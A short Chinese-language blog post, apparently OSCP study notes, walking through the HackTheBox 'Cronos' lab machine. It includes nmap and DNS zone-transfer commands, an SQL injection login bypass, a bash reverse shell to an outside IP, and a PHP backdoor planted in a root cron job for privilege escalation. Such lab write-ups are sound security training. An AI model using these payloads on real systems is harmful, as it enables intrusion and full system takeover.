OSCP备考_0x04_HackThBox靶机_Linux_cronos

Ethan医生1周前 (06-26)靶场19

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.184.136 (扫描TCP)

nmap -sU --top-ports 100 10.129.184.136 (扫描UDP)

看到80端口直接冲过去，发现了经典Apache2页面，然后进行dirb，dirbuster各种目录扫描，居然没有收获。

dig +short -x 10.129.184.136 @10.129.184.136

dig axfr cronos.htb @10.129.184.136

登入存在账号:admin' or 1=1# SQL漏洞

发现代码执行

直接使用反弹shell

bash -c 'bash -i >& /dev/tcp/10.10.16.31/3333 0>&1'

开始操作提权

cat /etc/crontab

artisan有修改执行权限,那就再里面插入代码

直接删除挡案后上传本地的后门文件

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.31/3334 0>&1'"); ?>

反弹后直接拿到ROOT

标签: OSCP

返回列表

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.135.112 (扫描TCP)nmap -p139,445 -A -T5 --scrip...

名称说明靶机下载链接https://www.vulnhub.com/entry/raven-1,256/攻击机（kali）ip：192.168.233.168靶机（CentOS）ip：192.168....

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-level-13-4,25/攻击机（kali）ip：192.168.233.168靶机（CentOS）...

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.240.214 nmap -sU --top-ports 100 10.129.240....

先连接到外网开放的服务器openvpn xxx.ovpn信息收集nmap -p- 10.129.216.48 (这样扫描太慢了)nmap -sCV -p- --min-rate 10000 -T4 -...

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.21.112 (扫描TCP)nmap -sU --top-ports 100 ...

EthanDoctor